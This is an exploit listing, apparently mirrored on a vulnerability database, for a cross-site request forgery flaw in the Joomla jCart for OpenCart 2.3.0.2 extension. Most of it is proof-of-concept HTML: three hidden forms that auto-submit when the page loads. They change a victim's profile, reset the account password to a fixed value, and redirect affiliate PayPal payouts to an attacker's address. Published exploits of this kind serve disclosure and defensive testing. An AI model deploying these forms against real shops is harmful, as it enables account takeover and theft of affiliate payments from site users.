Lucene search
K

Joomla jCart For OpenCart 2.3.0.2 Cross Site Request Forgery

🗓️ 28 May 2018 00:00:00Reported by Borna NematzadehType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 42 Views

Joomla jCart for OpenCart 2.3.0.2 Cross Site Request Forger

Code
`# Exploit Title: Joomla! extension jCart for OpenCart 2.3.0.2 - Cross site request forgery  
# Date: 2018-05-28  
# Exploit Author: L0RD or [email protected]  
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/  
# Vendor Homepage: https://www.joomlaextensions.co.in/  
# Version: 2.3.0.2  
# Tested on: Kali linux  
===================================================  
  
# POC :  
  
# Change user information exploit :  
  
<html>  
<body>  
<form action="http://site.com/jcart/account/edit.html" method="POST" enctype="multipart/form-data">  
<input type="hidden" name="firstname" value="D3C0DE" />  
<input type="hidden" name="lastname" value="revenge" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="telephone" value="100000" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
  
# Change password exploit :  
  
<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">  
<input type="hidden" name="password" value="2468" />  
<input type="hidden" name="confirm" value="2468" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
  
  
# Change affiliate account information exploit :  
  
<form action="http://site.com/jcart/account/affiliate/edit.html" method="POST" enctype="multipart/form-data">  
<input type="hidden" name="company" value="decode" />  
<input type="hidden" name="website" value="test.com" />  
<input type="hidden" name="tax" value="100000000" />  
<input type="hidden" name="payment" value="paypal" />  
<input type="hidden" name="cheque" value=" " />  
<input type="hidden" name="paypal" value="[email protected]" />  
<input type="hidden" name="bank_name" value=" " />  
<input type="hidden" name="bank_branch_number" value=" "  
/>  
<input type="hidden" name="bank_swift_code" value=" " />  
<input type="hidden" name="bank_account_name" value=" " />  
<input type="hidden" name="bank_account_number" value=" "  
/>  
</form>  
<script>  
document.forms[0].submit();  
</script>  
  
====================================================  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 May 2018 00:00Current
0.4Low risk
Vulners AI Score0.4
42